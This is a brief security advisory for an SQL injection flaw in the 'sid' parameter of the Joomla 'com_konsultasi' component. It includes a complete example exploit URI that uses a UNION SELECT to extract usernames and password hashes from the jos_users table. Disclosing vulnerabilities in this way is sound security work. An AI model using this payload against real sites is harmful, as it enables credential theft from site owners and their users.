Joomla! 'com_konsultasi' Component 'sid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=-5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--


 

Privacy Statement
Copyright 2010, SecurityFocus